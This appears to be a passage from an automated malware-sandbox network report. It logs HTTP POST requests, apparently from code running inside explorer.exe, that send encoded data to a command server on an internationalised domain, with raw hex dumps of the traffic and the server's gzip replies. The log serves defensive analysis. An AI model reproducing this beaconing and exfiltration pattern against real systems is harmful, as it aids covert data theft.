                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:28.628016949 CET11787OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xn--29-oj9ik7b890b.net
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xn--29-oj9ik7b890b.net
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xn--29-oj9ik7b890b.net/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 56 72 70 38 63 62 49 45 70 59 55 42 66 45 6f 75 6c 6f 7e 35 77 61 64 37 64 45 4d 59 50 4c 28 38 4e 50 75 44 54 32 67 51 43 38 75 33 4b 43 63 37 69 6e 35 4e 64 36 28 6d 28 31 61 52 57 51 59 79 4d 32 4d 46 56 6d 74 31 78 61 62 53 6d 57 36 71 69 4e 50 62 62 79 47 78 39 77 45 38 6d 78 5a 51 4c 6e 4e 67 7e 64 33 7a 48 45 61 67 48 7a 42 57 38 43 5a 70 59 2d 68 2d 50 42 63 30 6a 32 4c 6d 47 64 53 44 34 43 58 56 77 51 57 54 46 64 73 54 4a 41 45 46 45 64 72 79 46 34 61 5f 6d 72 64 74 79 6a 68 76 45 49 4f 72 71 53 4a 52 6b 57 55 47 4b 45 48 5a 64 56 33 78 43 58 45 78 4f 70 32 44 55 68 78 44 70 2d 45 47 5a 43 61 4e 62 47 35 67 78 50 74 61 4b 39 44 51 55 36 6d 6b 6b 76 30 41 41 37 62 72 41 75 45 6c 6b 4e 4f 52 51 64 42 41 6b 69 7a 35 7e 6b 68 6c 36 49 62 58 64 73 63 63 58 72 46 4a 63 52 50 78 64 44 33 70 73 37 55 4d 6e 63 6f 42 46 5f 36 6f 70 75 65 33 6f 67 73 75 72 37 6c 72 33 41 6b 36 4b 58 7a 5f 77 4a 41 69 77 49 6c 47 28 2d 67 33 75 31 35 53 36 5a 79 65 38 57 56 69 54 65 33 5a 69 71 47 52 67 43 6a 76 56 66 4a 6c 4c 56 4c 6e 47 50 56 59 66 5a 48 49 7a 41 51 53 78 37 49 37 4a 4d 33 61 63 56 78 71 64 79 30 61 67 55 52 67 6f 50 44 44 58 67 58 32 77 78 44 6b 54 53 70 78 46 37 39 49 58 39 51 37 54 65 4d 37 6e 5f 51 48 62 4b 51 33 54 4a 73 72 74 4d 66 78 58 2d 33 4f 66 61 4c 69 4f 5f 73 36 39 57 44 6a 47 33 65 79 71 4c 6e 64 77 76 70 38 31 4d 57 6e 43 7a 68 70 64 62 58 56 4d 68 71 69 5a 53 4a 57 70 65 77 71 58 36 57 4e 73 46 57 4c 39 70 69 4b 36 64 32 5a 4e 4c 42 72 34 59 77 55 39 79 66 6f 31 32 62 65 48 62 36 67 79 4f 61 72 7a 79 73 57 58 64 38 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=Vrp8cbIEpYUBfEoulo~5wad7dEMYPL(8NPuDT2gQC8u3KCc7in5Nd6(m(1aRWQYyM2MFVmt1xabSmW6qiNPbbyGx9wE8mxZQLnNg~d3zHEagHzBW8CZpY-h-PBc0j2LmGdSD4CXVwQWTFdsTJAEFEdryF4a_mrdtyjhvEIOrqSJRkWUGKEHZdV3xCXExOp2DUhxDp-EGZCaNbG5gxPtaK9DQU6mkkv0AA7brAuElkNORQdBAkiz5~khl6IbXdsccXrFJcRPxdD3ps7UMncoBF_6opue3ogsur7lr3Ak6KXz_wJAiwIlG(-g3u15S6Zye8WViTe3ZiqGRgCjvVfJlLVLnGPVYfZHIzAQSx7I7JM3acVxqdy0agURgoPDDXgX2wxDkTSpxF79IX9Q7TeM7n_QHbKQ3TJsrtMfxX-3OfaLiO_s69WDjG3eyqLndwvp81MWnCzhpdbXVMhqiZSJWpewqX6WNsFWL9piK6d2ZNLBr4YwU9yfo12beHb6gyOarzysWXd8.
                                                                                                                                                                          Dec 5, 2022 15:17:28.927171946 CET11788INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:28 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          Content-Length: 11649
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb
                                                                                                                                                                          Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|!IL*.&iZIWg_L0$L`|:lFLi $fyhi7<ZZKn84Wk5S&?Ke*RByYbp???}"3=oBb+vUuv)&<94D`$5=oR4bl=uT7&h4Yf2fmXlicjB~Qm$dz#x/D|Qh9KR9pdJn3hg;Jyb?Cp^q_VLxoaa+@gU:E,V%qU>k3e </%M\:=;5&g?#&<'@h4gBvb-an2'[hLleS`>Pl{ha9YWlh\i~0pm-yh|'`GZ|X'./&M4|fsZ.L=`TcJUE
                                                                                                                                                                          Dec 5, 2022 15:17:28.927288055 CET11789INData Raw: 60 8a 0a 38 21 44 b8 1d e3 98 65 06 d3 86 55 aa fd 39 43 39 ab cc 16 b3 12 ae ea f3 f7 97 9f b2 f8 f7 58 0a 17 8d 04 18 ca f9 43 f7 47 96 1d c8 f0 83 84 8b f0 c2 20 0f a5 2f d4 f4 5b 5a b3 e5 45 23 12 cc ba ac 72 55 13 bb e5 45 96 29 6d f2 e9 2d
                                                                                                                                                                          Data Ascii: `8!DeU9C9XCG /[ZE#rUE)m-)8"|1~Sw/#@&o|E[4oytVf>&HpvK;Ve4w]L4p{fV?h8h{ngn5zG{7yguzV?lMY
                                                                                                                                                                          Dec 5, 2022 15:17:28.927347898 CET11790INData Raw: 51 07 ef 25 39 09 cb e9 76 19 b7 19 0b 43 2e e3 b1 e7 f8 3d 48 89 ef 74 06 f8 9e a4 4c c7 5c 52 a3 b2 b1 bb 3e cc 14 72 4c c7 ee 23 9c 12 60 16 71 9f 4d e2 1d 34 6e 25 fe bd 48 e7 5e a4 7b 2f d2 bb 17 e9 9f 36 d2 23 ac 51 1b 16 a3 e3 93 03 15 79
                                                                                                                                                                          Data Ascii: Q%9vC.=HtL\R>rL#`qM4n%H^{/6#QyN*.mpW9B0}*KWvP,+-3TPqunc@FB13~tq$81c?s;A%RF3GJ"@,h.xuCwj<O@E
                                                                                                                                                                          Dec 5, 2022 15:17:28.927396059 CET11792INData Raw: f7 f3 f3 8c 05 40 67 60 e6 00 f2 5e dd de ed 9d 93 07 1a df 28 09 0b d1 35 56 af db 99 d2 f8 3d 76 27 81 e0 d9 58 a3 36 17 5e b6 68 ed fc 37 cb 2b 9a 31 93 8c b9 c4 f5 5e f4 dc 77 9b 93 04 2c d3 31 26 4c 52 74 21 97 63 6a bf d5 0d e8 48 a8 f9 38
                                                                                                                                                                          Data Ascii: @g`^(5V=v'X6^h7+1^w,1&LRt!cjH8ar02~fi54S0iH#V.9PB;aVs-vUvM0*l-AbM=d*nF|x],B4+.[0%c?wIpQ
                                                                                                                                                                          Dec 5, 2022 15:17:28.927443981 CET11793INData Raw: c3 ca b9 0c ff b7 be ab 01 3c 9a 7b 32 7c 0e 81 92 e8 b5 e5 e3 e8 9b d4 93 c1 0d 68 c3 4f c2 5e 67 3e b0 1e cd 53 4c 78 5c 93 fa c4 d3 80 1f 52 a3 36 ef 34 d8 07 74 a8 4b bb 07 1a 29 69 68 ce bf 40 d8 3c 65 42 8c 89 a7 21 3d 9e 94 42 c8 8b 14 b3
                                                                                                                                                                          Data Ascii: <{2|hO^g>SLx\R64tK)ih@<eB!=B=)Nyuf X][s3o)Xy/siL*z_py1`Fbm>Q3Te>g2o`VHS>`0B=(1y 'U<Pcx^s""u0y.cJ}wL\
                                                                                                                                                                          Dec 5, 2022 15:17:28.927503109 CET11794INData Raw: 4d f2 8c a7 99 d2 86 49 b3 c2 08 96 4c e2 65 c1 f3 84 a2 e4 cb 13 e1 0e cb 6a 90 e7 09 37 70 22 5c 99 5b 83 91 31 01 34 c3 5d 9d 88 b3 c9 af c1 ba e1 37 3c a4 1a c2 13 b1 36 f9 35 58 a2 48 b9 54 c5 1a 14 97 23 e3 53 67 ad ad 7d bc 07 4b 67 e8 c8
                                                                                                                                                                          Data Ascii: MILej7p"\[14]7<65XHT#Sg}Kg'(K:XodjevUGqBg@Hi*6XpJhh2<u)UvNH,uZb5k<fjrVopDsCg\N7TC
                                                                                                                                                                          Dec 5, 2022 15:17:28.927552938 CET11796INData Raw: 4d cf 51 dd 73 d2 46 86 79 a0 79 66 08 aa 7c 62 4b 2e 03 51 84 d8 6c 86 5b b9 ce db 92 dd f0 98 19 ae 64 fb 86 c3 dc 49 b9 74 3e af 1a 06 7e b7 d3 71 a3 7e a7 17 f5 82 d9 28 ec 81 0b d5 f4 88 53 96 d3 6d 35 b5 d5 f4 f3 fc fc 0a e5 2b 49 bd 05 76
                                                                                                                                                                          Data Ascii: MQsFyyf|bK.Ql[dIt>~q~(Sm5+Iv4U!y?Y;|X~T^^:N**%n[MSkf`C8il$rd2vrt$zZs|1eRu~cF'}z;,YdIMMwy$ 7uw+
                                                                                                                                                                          Dec 5, 2022 15:17:28.927604914 CET11797INData Raw: ca ef bf 11 bf cf 50 46 aa 50 b0 18 7e 6b ed be 6b 76 7f d0 db b3 ed c3 06 77 9d 3e 56 74 7b 2b 04 ff 64 bf 0f ef f9 dd 1b f5 dd c1 b0 db f1 3a 03 bf b7 83 f3 ad 07 70 bc 15 d5 76 8d 3c 1b cd d0 33 40 b8 f4 a7 8d e7 aa d0 01 7c a4 59 96 f0 a0 41
                                                                                                                                                                          Data Ascii: PFP~kkvw>Vt{+d:pv<3@|YAT.W0zQ9dcq=yQ:n4=jQbdCO)?#aq"A"nxg\pr%" 2cBG-&DoQyFBG#!!e?cuu
                                                                                                                                                                          Dec 5, 2022 15:17:28.927653074 CET11798INData Raw: f2 d5 30 85 ca 4b 07 cf b8 0c 01 e7 a0 de fd e5 94 49 15 f6 2b 81 87 9c 09 15 d7 f9 67 c5 d4 e2 ed 1a 6f df 63 5f fe e5 7f 2b 3d 56 4b e7 d5 9d 57 8d 5a f9 ea 89 06 3a 62 c7 d3 7c 95 31 93 10 5c d6 c7 5e 87 78 9e 33 14 7d c7 a3 7d a7 43 3d 6a df
                                                                                                                                                                          Data Ascii: 0KI+goc_+=VKWZ:b|1\^x3}}C=j;>b>={*sT>/mT_ 6q:c1PsL:/_RR*Ir}<&)hjUe6xBpy}QI?16K:?l3Zp|b#v^v
                                                                                                                                                                          Dec 5, 2022 15:17:28.927695990 CET11799INData Raw: fe dd d9 63 2a 8c 23 15 14 f9 4a 0b 16 5c 5b e7 ca 10 5d 2d 14 aa f2 0e 00 ec 08 c3 0a a3 0e 19 ed 48 22 95 5c 65 af aa bb dd 6e 79 0e 79 9e 09 b6 1c 93 d2 cc 65 28 52 d2 a0 ab bf 00 1c 06 d2 3d 09 6d 97 32 20 20 c2 63 6f 35 2b 0e 00 74 9d 53 4d
                                                                                                                                                                          Data Ascii: c*#J\[]-H"\enyye(R=m2 co5+tSMjJ(*]7+U7\@HTJ-Kk]4~^h*0MC?E!S)HQz:Lr2.Ie|3wC#fT&A: )V


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          45192.168.11.204988750.87.192.14480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:30.815977097 CET11805OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xn--29-oj9ik7b890b.net
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xn--29-oj9ik7b890b.net
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xn--29-oj9ik7b890b.net/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 56 72 70 38 63 62 49 45 70 59 55 42 66 45 6f 75 6c 6f 7e 35 77 61 64 37 64 45 4d 59 50 4c 28 38 4e 50 75 44 54 32 67 51 43 38 6d 33 4b 77 55 37 6b 47 35 4e 63 36 28 6d 32 56 61 63 57 51 59 72 4d 32 6b 42 56 6d 70 44 78 5a 7a 53 68 46 43 71 69 66 6e 62 4c 43 47 77 6a 41 45 36 69 78 59 52 4c 6e 51 6e 7e 64 53 52 48 30 47 67 57 42 4a 57 72 46 31 71 43 4f 68 34 50 42 63 77 30 6d 4c 41 47 64 6d 54 34 43 62 56 77 56 65 54 45 76 6b 54 4c 58 6f 46 66 64 72 31 4d 59 61 37 28 37 64 69 79 6a 6c 46 45 49 4f 52 71 58 35 52 6b 55 63 47 4c 44 72 59 63 31 33 78 42 58 45 32 4b 70 71 48 55 68 74 4c 70 39 59 47 5a 46 65 4e 55 47 35 67 7a 72 42 62 4a 64 44 4b 66 61 6d 6f 79 66 6f 59 41 37 50 5a 41 75 51 6c 6b 64 61 52 43 36 64 41 70 6a 7a 35 77 6b 68 72 7e 49 62 45 57 4d 64 64 58 72 56 56 63 52 76 4c 64 45 76 70 74 61 30 4d 69 39 6f 41 56 50 36 75 31 65 66 39 6a 41 67 69 72 34 64 33 33 41 6c 69 4b 54 72 5f 77 36 59 69 78 4d 4a 46 79 4f 67 77 69 56 35 44 30 35 4f 55 38 57 4a 36 54 61 7a 4a 69 70 71 52 67 69 6a 76 48 4a 42 6b 45 56 4c 67 45 50 56 4b 62 5a 48 54 7a 41 4e 7a 78 36 4d 4e 4a 39 4c 61 66 46 42 71 4d 79 30 62 6c 30 52 73 68 76 44 4e 63 41 58 32 77 78 66 61 54 58 78 78 46 75 4a 49 57 4b 38 37 58 4a 59 37 72 66 51 46 62 4b 51 6d 54 49 51 49 74 4d 57 53 58 5f 48 6b 66 59 48 69 41 4b 49 36 38 6e 44 73 44 48 65 39 75 4c 6d 48 30 75 56 72 31 4d 4b 56 43 7a 52 35 64 4a 6a 56 4e 68 36 69 64 53 4a 56 38 4f 77 74 51 36 58 4f 6f 46 4c 4b 39 70 57 77 36 65 71 7a 4e 4c 70 72 34 63 46 79 73 6a 28 6c 67 45 44 44 45 64 53 79 34 39 32 78 75 51 30 38 4d 4a 42 4b 6f 47 55 56 71 5a 73 68 6b 5a 47 72 4d 4a 6a 30 66 34 61 44 77 41 53 65 28 34 32 48 41 6a 49 72 48 46 57 79 6f 52 76 67 76 41 77 31 41 4d 75 69 53 79 6e 42 56 56 4c 66 35 48 52 5f 39 5a 4c 54 28 48 6b 70 67 76 6c 48 46 31 76 6b 49 72 65 5f 4e 49 73 58 52 54 4e 6c 45 49 44 7a 77 5f 57 53 48 68 6a 6b 70 45 30 30 4e 4b 31 50 72 5f 74 79 45 41 33 5f 51 73 63 6e 59 75 41 38 4f 4c 63 67 79 6f 4d 37 51 50 50 32 48 61 31 30 53 30 62 4e 71 44 41 48 59 67 6c 79 58 33 58 53 6f 74 32 5f 31 70 4f 6f 39 79 43 2d 59 35 59 69 4e 4d 78 37 47 78 65 6b 4e 45 76 5a 6f 32 66 58 49 75 76 57 69 53 6c 44 66 68 59 42 68 70 68 74 7e 5a 49 34 39 4e 42 30 79 69 6c 70 39 73 38 74 49 32 4d 42 76 65 61 5a 7e 51 44 77 31 6d 66 46 4d 4c 6f 4c 49 54 77 51 31 36 57 74 41 4f 70 71 63 43 4d 71 4e 6d 53 4a 48 43 6c 70 79 58 44 55 44 48 4f 75 78 64 69 73 66 35 7e 53 55 35 71 79 74 41 48 66 62 37 39 6d 4c 42 65 7a 52 30 51 4e 54 30 64 72 5a 5f 79 66 70 71 54 6d 7e 6f 65 67 4a 54 69 52 34 6d 69 52 4f 4d 4f 39 53 4a 34 72 68 39 4c 69 47 37 7a 37 34 33 41 6a 37 78 66 7a 4d 6e 4a 47 79 7a 64 37 43 4d 4d 53 77 51 4e 69 75 4e 48 45 68 5f 58 54 65 78 66 31 5a 30 4e 49 6e 48 76 76 6a 31 38 68 45 33 58 5a 41 44 58 34 7e 54 64 31 41 4c 72 74 74 48 4f 45 71 46 33 2d 78 79 65 72 44 50 71 4f 49 4b 7e 5f 37 77 74 31 66 6f 78 73 41 68 4b 6e 4f 33 28 73 4e 41 7e 46 6c 61 78 72 6d 65 61 69 47 38 6e 2d 43 75 38 6b 37 65 6a 73 41 39 49 50 30 34 5a 2d 55 71 41 70 28 61 6c 72 30 39 76 30 77 33 55 56 79 46 72 37 7a 74 61 64 28 46 50 69 43 69 66 78 4f 4a 52 45 44 5a 59 37 74 54 62 36 79 63 61 67 30 6b 4b 72 56 75 6c 31 46 6a 45 6b 46 52 4d 46 6d 54 34 5f 78 68 4f 57 7e 6d 4a 49 58 30 33 4c 32 59 71 4b 4c 6b 6b 38 4e 7a 78 73 70 5f 57 75 75 6b 79 75 73 78 30 4d 73 42 37 54 71 34 79 62 57 4b 76 65 73 6e 78 4c 28 43 35 34 62 48 77 59 66 37 66 70 63 6e 67 71 74 41 46 4d 7e 65 56 4c 52 6d 6b 4e 51 52 28 66 57 61 28 4f 4a 65 4f 39 51 45 7a 6e 4a 31 34 37 74 64 4a 44 4b 78 67 6d 4b 78 59 56 78 59 44 50 79 7a 71 56 34 5f 39 52 54 77 78 77 57 70 4b 4c 73 52 67 4b 4d 66 30 64 4d 4d 36 31 43 73 77 5f 59 54 46 6c 69 48 76 7a 4d 69 39 66 32 38 7e 38 5a 35 68 45 67 69 72 74 28 32 28 79 28 44 37 4c 74 71 76 55 4f 4b 50 2d 51 45 31 75 77 6e 32 53 51 68 57 75 45 4b 4e 4e 53 61 7e 52 79 5a 68 61 45 77 73 6c 62 5f 43 73 57 2d 4a 62 4c 38 42 52 49 74 77 2d 75 65 75 36 4e 6d 57 72 4a 76 7a 75 5a 49 4c 72 7a 6f 7a 44 55 54 72 42 45 57 52 54 33 6d 41 6a 7a 36 4b 31 42 61 36 66 65 67 56 49 57 75 4a 31 30 41 6e 50 48 54 66 58 67 6f 46 38 66 45 39 57 47
                                                                                                                                                                          Data Ascii: 7nWHV=Vrp8cbIEpYUBfEoulo~5wad7dEMYPL(8NPuDT2gQC8m3KwU7kG5Nc6(m2VacWQYrM2kBVmpDxZzShFCqifnbLCGwjAE6ixYRLnQn~dSRH0GgWBJWrF1qCOh4PBcw0mLAGdmT4CbVwVeTEvkTLXoFfdr1MYa7(7diyjlFEIORqX5RkUcGLDrYc13xBXE2KpqHUhtLp9YGZFeNUG5gzrBbJdDKfamoyfoYA7PZAuQlkdaRC6dApjz5wkhr~IbEWMddXrVVcRvLdEvpta0Mi9oAVP6u1ef9jAgir4d33AliKTr_w6YixMJFyOgwiV5D05OU8WJ6TazJipqRgijvHJBkEVLgEPVKbZHTzANzx6MNJ9LafFBqMy0bl0RshvDNcAX2wxfaTXxxFuJIWK87XJY7rfQFbKQmTIQItMWSX_HkfYHiAKI68nDsDHe9uLmH0uVr1MKVCzR5dJjVNh6idSJV8OwtQ6XOoFLK9pWw6eqzNLpr4cFysj(lgEDDEdSy492xuQ08MJBKoGUVqZshkZGrMJj0f4aDwASe(42HAjIrHFWyoRvgvAw1AMuiSynBVVLf5HR_9ZLT(HkpgvlHF1vkIre_NIsXRTNlEIDzw_WSHhjkpE00NK1Pr_tyEA3_QscnYuA8OLcgyoM7QPP2Ha10S0bNqDAHYglyX3XSot2_1pOo9yC-Y5YiNMx7GxekNEvZo2fXIuvWiSlDfhYBhpht~ZI49NB0yilp9s8tI2MBveaZ~QDw1mfFMLoLITwQ16WtAOpqcCMqNmSJHClpyXDUDHOuxdisf5~SU5qytAHfb79mLBezR0QNT0drZ_yfpqTm~oegJTiR4miROMO9SJ4rh9LiG7z743Aj7xfzMnJGyzd7CMMSwQNiuNHEh_XTexf1Z0NInHvvj18hE3XZADX4~Td1ALrttHOEqF3-xyerDPqOIK~_7wt1foxsAhKnO3(sNA~FlaxrmeaiG8n-Cu8k7ejsA9IP04Z-UqAp(alr09v0w3UVyFr7ztad(FPiCifxOJREDZY7tTb6ycag0kKrVul1FjEkFRMFmT4_xhOW~mJIX03L2YqKLkk8Nzxsp_Wuukyusx0MsB7Tq4ybWKvesnxL(C54bHwYf7fpcngqtAFM~eVLRmkNQR(fWa(OJeO9QEznJ147tdJDKxgmKxYVxYDPyzqV4_9RTwxwWpKLsRgKMf0dMM61Csw_YTFliHvzMi9f28~8Z5hEgirt(2(y(D7LtqvUOKP-QE1uwn2SQhWuEKNNSa~RyZhaEwslb_CsW-JbL8BRItw-ueu6NmWrJvzuZILrzozDUTrBEWRT3mAjz6K1Ba6fegVIWuJ10AnPHTfXgoF8fE9WGai4FvpewpemXbFET8DegVBMiGOKSN4uAiw8oEvh3Ktb4I9cfbzg2QSqa5cNySmPMLCnVwrYZsPjN9cV~WpPyRLRviyZB-nUUthkeH5MX9xd~KSa6JMmO8rQgIq7z4f_hLdtVK8Q0FYjFgaNUkdZ1nBKFzpoIDeNWw11Lbmv16g8EkjJjkZ2fEwuaqs7CtjxqHJTWc8TfLn44ZtYULmDhVaexzpqIdCeJEAapXhPJ79jGKljOwSnJ7ZjDjvOQh7MahamUV9iMdIQ0Hw1f6O8mQGakIlWVuTFTT30srzD1STgVsO8xvYirBQKT3WaipIgdJvCScYmLnUmi6fqYmKBicPP2mpS9FBjdeKVb_SiahgTCdKZxddEtVKL7m(tf9Ma7E8Xhe9my8Yk8ukigUzLDlNnnMmfY-zxwSfarvkt0ZYrZP35x_LTxtZOE4cAwubSUHBsjymnglXF~mZkkkJg1cItjeJhPnBcbT1W6OSNMFyyeeHCwmA5SDHE1LHyhlL_D2OM~ZZ86wEV5dLrDp4nX80d31fZyrKiuh8FLINsxxNu~i5W61NafzAVksW9VbAsZve_f9LcbNiCtndtkqEyIa4U27DCMRldTE9LMoqBhzUAE-mkkjWUuoInztRIw7IE7LUjf0zRuZ3niDllPoklROtFvB5aEGRuwzVaxjOoYAPKn98Ud05TZAH0BAu5(qTRubkS6p64ekVIOYGkZxis2D~oHXq9eIU7kDUQ(VJIWiKAM5P_KJ536_BOn6LbwNzVGZykSL4f8TC6I5Lcw2plSO8SpG8PugYfwp~lnOM0wqkA2Bl7eVjIDBoCU3(XO5fm6Rv8DLtE9dlGLxAgUIEPIEYVmkfaMluLMGQI2xlOZe9B(-Gjj4VBRCBKYXNl5n5dIvbIQ7Kx4kjUXBTS2ZpjXEXsddPCcv86aEWwZ5BcyoV-Km476UnxJ_Q9lSmv1f2DvzpJGCmEw0f5oxF_(aa7zZJxPtuLK4~fkU0genGEidOqgZacWH8SriBwCjVJ1eoPqxg12EGRGDt4MtvYM0aZbiMhIAqmtKJogoB7EIe13vmOuypotn0LxzNCLlm6xBq6gvrEvCQcO90DFbO2AQUc~730BtMSO83GBTZR8P2geLApDg4anHv0DqA_cbfTxxF7fw85aL(w52dpz_JYJlb5MDIxyLf1Wx1w7iKqrLlTOsnF9eB277bsFeXbTquKd0j38wHsZaew7Id96oFg(3PhYuSCT552MLcoX6ZcF_RN9E6WlUYgRupO3lQrcwIgarKIWK2AcX(fGL8PQVGFRfwaU13y4vHtBoQ3Llk93wqp4I5aROxCX5(hjI7m(xyWj-U4liHJSTcD(JfgEG4Icoq-W0(E5yEqym6RkdVGD5R9IqYXCMEPwWi3oTVj8VyNbuPsoq4h25CD1nuhedKTz0wjYugR5CG3A5ANZ71ek4nzCiCNIzbAWgjYOKsgvmmm~Esa0CdjA-g-N3f9GL~ln2WbxyLSuuVWh1PvzZqs16l3A2HPdOjWs4vbPQi0oYrN(qupFHb2Gbvmmv9BArNn764-MCWLtIgRqVqskKZgWLi8HRBWuBu1DIiKJm20503tewb95sXNBBqwCFrJ0P03yGRdG2wIBdvnZETaC1qVBXXzArxE7Up8fm4qMrJPj6r5sF2ZhEC84sA0Tmvboa3LTxbC6pLEbcdv7qtb6nacIpZzLVLsTsmnyS~VfzAs6j31nF7Zwim_DVicFM(q1QC9uS7KJ-SX8sd-xu(DDTdR6SGsII4YlsNjwwhaydjjxgbwwyj9fPSPcdfAcl7q23vDT5bgvaAEmrCtqFMeePTIgYkpCVMagZqI9NALZ0p0ldYvhT18(157P7ZL0AStI5jrCLY6SHV0JNP9vxemZ2~9WRyLBiA-BzHmg-mrf56nymEForywVjZcRTgHH89-9HGGV5AAZ17h6_ifCXMcohlozAxT9pviN00z8n9yHYBOdNF0u3WvAZcTfX0PDXwGNpaQxTPtSnaQCONzPvSXFXF5WPCUCQ21mYru0HYcB083qMQS0CqNhaxtbPEjcXYDFIS0c_JHdthDiv7zijgTDgM1BGHzjKE8dH~NRsn38dTYiZYSn50OI_C9AClDHnPyeIo6s29i5y9vcpsCOGtz6jw0fMUyykmwayI_6X21OYzg9cS2XskDE_pdQNMGlj7cL4lZKVUfC9DjflDE3iaoNCcwo9IlNGHlB7mQ9_Fy6uvorEFPH_Th